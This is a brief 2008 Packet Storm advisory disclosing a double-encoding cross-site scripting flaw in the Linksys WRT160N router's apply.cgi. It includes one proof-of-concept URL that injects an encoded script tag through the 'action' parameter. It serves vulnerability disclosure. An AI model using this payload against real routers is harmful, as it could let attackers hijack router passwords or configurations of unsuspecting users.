linksys-xss.txt

2008-11-29T00:00:00
ID PACKETSTORM:72376
Type packetstorm
Reporter David Gil
Modified 2008-11-29T00:00:00

Description

                                        
                                            `**********************************************************************  
* Linksys WRT160N Wireless Router Double encoding XSS Vulnerability *  
* *  
* By David Gil *  
* *  
* http://www.infosec.com.mx *  
* *  
* dagil@infosec.com.mx *  
* *  
**********************************************************************   
  
  
  
Using Double encoding attack you can inject XSS code into a HTTP POST request  
  
a common user can be easily cheated and compromise router password or router configuration.  
  
  
  
Proof of Concept:  
  
http://192.168.1.1/apply.cgi?submit_button=DHCP_Static&action=--%3E%3CScRiPt%20%0A%0D%3Ealert(398343216433)%3B%3C%2FScRiPt%3E&wait_time=0&forward_single=15  
  
  
  
Greetz:  
  
Alex Hernandez`